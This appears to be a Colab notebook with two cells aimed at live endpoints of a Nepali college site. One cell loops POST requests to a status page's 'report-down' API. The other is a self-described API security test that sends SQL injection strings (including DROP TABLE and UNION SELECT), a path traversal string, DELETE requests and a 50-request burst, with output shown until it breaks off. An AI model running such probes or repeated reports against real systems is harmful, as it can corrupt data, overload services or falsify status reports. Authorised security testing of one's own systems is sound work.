<a href="https://colab.research.google.com/github/kushalshah0/colab_tools/blob/main/down_reporter_tec.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [ ]:
import requests
import json
import time

# Configuration
NUM_REQUESTS = 10  # Change this to how many times you want to run
DELAY_SECONDS = 1  # Delay between requests (optional)

print(f"🔹 Running Python requests {NUM_REQUESTS} times...\n")

url = "https://status.tcioe.edu.np/api/report-down"
headers = {
    "Content-Type": "application/json"
}
data = {
    "service_id": ''
}

# Track results
success_count = 0
error_count = 0

for i in range(1, NUM_REQUESTS + 1):
    print(f"{'='*60}")
    print(f"Request #{i}/{NUM_REQUESTS}")
    print(f"{'='*60}")

    try:
        response = requests.post(url, headers=headers, json=data)

        print(f"Status Code: {response.status_code}")

        # Count successes (typically 200-299 status codes)
        if 200 <= response.status_code < 300:
            success_count += 1
            print("✅ Success")
        else:
            error_count += 1
            print("⚠️ Non-success status code")

        print(f"\nResponse Body:")

        # Try to parse as JSON, otherwise show raw text
        try:
            print(json.dumps(response.json(), indent=2))
        except:
            print(response.text)

    except requests.exceptions.RequestException as e:
        error_count += 1
        print(f"❌ Error: {e}")

    print()  # Empty line for readability

    # Add delay between requests (except for the last one)
    if i < NUM_REQUESTS and DELAY_SECONDS > 0:
        time.sleep(DELAY_SECONDS)

# Summary
print(f"\n{'='*60}")
print(f"📊 SUMMARY")
print(f"{'='*60}")
print(f"Total Requests: {NUM_REQUESTS}")
print(f"✅ Successful: {success_count}")
print(f"❌ Failed: {error_count}")
print(f"Success Rate: {(success_count/NUM_REQUESTS)*100:.1f}%")

In [16]:
import requests
import json

BASE_URL = "https://tcioe.edu.np/api/departments"

print("🔒 API Security Testing for Your Endpoint\n")
print("="*60)

# Test 1: Parameter Tampering - Large Limit
print("\n1️⃣ Testing LARGE LIMIT values (potential DoS)")
print("-"*60)
for limit in [1000, 10000, 999999]:
    try:
        response = requests.get(f"{BASE_URL}?limit={limit}")
        print(f"Limit={limit}: Status={response.status_code}, "
              f"Response size={len(response.content)} bytes, "
              f"Count={response.json().get('count', 'N/A')}")
    except Exception as e:
        print(f"Limit={limit}: Error - {e}")

# Test 2: SQL Injection attempts in ordering
print("\n2️⃣ Testing SQL INJECTION in ordering parameter")
print("-"*60)
sql_payloads = [
    "name' OR '1'='1",
    "name; DROP TABLE departments--",
    "name' UNION SELECT * FROM users--",
    "name';--",
    "../../../etc/passwd"
]
for payload in sql_payloads:
    try:
        response = requests.get(f"{BASE_URL}?ordering={payload}")
        print(f"Payload: {payload[:30]}... => Status={response.status_code}")
        if response.status_code == 500:
            print("  ⚠️ SERVER ERROR - Possible vulnerability!")
    except Exception as e:
        print(f"  Error: {e}")

# Test 3: Invalid parameters
print("\n3️⃣ Testing INVALID/UNEXPECTED parameters")
print("-"*60)
test_params = [
    {"limit": -1},
    {"limit": "abc"},
    {"ordering": "nonexistent_field"},
    {"offset": -100},
    {"random_param": "test"},
]
for params in test_params:
    try:
        response = requests.get(BASE_URL, params=params)
        print(f"Params={params} => Status={response.status_code}")
        if response.status_code == 500:
            print("  ⚠️ SERVER ERROR - Poor error handling!")
    except Exception as e:
        print(f"  Error: {e}")

# Test 4: HTTP Methods
print("\n4️⃣ Testing UNSUPPORTED HTTP METHODS")
print("-"*60)
methods = ["POST", "PUT", "DELETE", "PATCH", "OPTIONS"]
for method in methods:
    try:
        response = requests.request(method, BASE_URL)
        print(f"{method}: Status={response.status_code}")
        if response.status_code not in [405, 403, 401]:
            print(f"  ⚠️ Unexpected status code!")
    except Exception as e:
        print(f"  Error: {e}")

# Test 5: Rate Limiting
print("\n5️⃣ Testing RATE LIMITING")
print("-"*60)
print("Sending 50 rapid requests...")
status_codes = []
for i in range(50):
    try:
        response = requests.get(BASE_URL)
        status_codes.append(response.status_code)
    except Exception as e:
        status_codes.append(f"Error: {e}")

rate_limit_detected = 429 in status_codes
print(f"Status codes: {set(status_codes)}")
print(f"Rate limiting: {'✅ ENABLED (429 detected)' if rate_limit_detected else '❌ NOT DETECTED'}")

# Test 6: Headers and Security
print("\n6️⃣ Testing SECURITY HEADERS")
print("-"*60)
response = requests.get(BASE_URL)
security_headers = {
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY or SAMEORIGIN",
    "Strict-Transport-Security": "HSTS",
    "Content-Security-Policy": "CSP",
    "X-XSS-Protection": "XSS Protection"
}

for header, description in security_headers.items():
    value = response.headers.get(header)
    if value:
        print(f"✅ {header}: {value}")
    else:
        print(f"❌ {header}: MISSING ({description})")

# Test 7: Information Disclosure
print("\n7️⃣ Testing INFORMATION DISCLOSURE")
print("-"*60)
sensitive_headers = ["Server", "X-Powered-By", "X-AspNet-Version"]
for header in sensitive_headers:
    value = response.headers.get(header)
    if value:
        print(f"⚠️ {header}: {value} (May reveal tech stack)")
    else:
        print(f"✅ {header}: Not disclosed")

print("\n" + "="*60)
print("📋 SUMMARY & RECOMMENDATIONS")
print("="*60)
print("""
Key things to check:
1. Implement rate limiting if not present
2. Add security headers (especially HSTS, CSP)
3. Validate limit parameter (cap at reasonable max)
4. Test error handling for SQL injection patterns
5. Remove server version headers
6. Implement proper CORS policies
7. Add authentication if data is sensitive
8. Monitor for unusual traffic patterns
""")

🔒 API Security Testing for Your Endpoint


1️⃣ Testing LARGE LIMIT values (potential DoS)
------------------------------------------------------------
Limit=1000: Status=200, Response size=52 bytes, Count=0
Limit=10000: Status=200, Response size=52 bytes, Count=0
Limit=999999: Status=200, Response size=52 bytes, Count=0

2️⃣ Testing SQL INJECTION in ordering parameter
------------------------------------------------------------
Payload: name' OR '1'='1... => Status=200
Payload: name; DROP TABLE departments--... => Status=200
Payload: name' UNION SELECT * FROM user... => Status=200
Payload: name';--... => Status=200
Payload: ../../../etc/passwd... => Status=200

3️⃣ Testing INVALID/UNEXPECTED parameters
------------------------------------------------------------
Params={'limit': -1} => Status=200
Params={'limit': 'abc'} => Status=200
Params={'ordering': 'nonexistent_field'} => Status=200
Params={'offset': -100} => Status=200
Params={'random_param': 'test'} => Status=200

4️⃣ Testing UN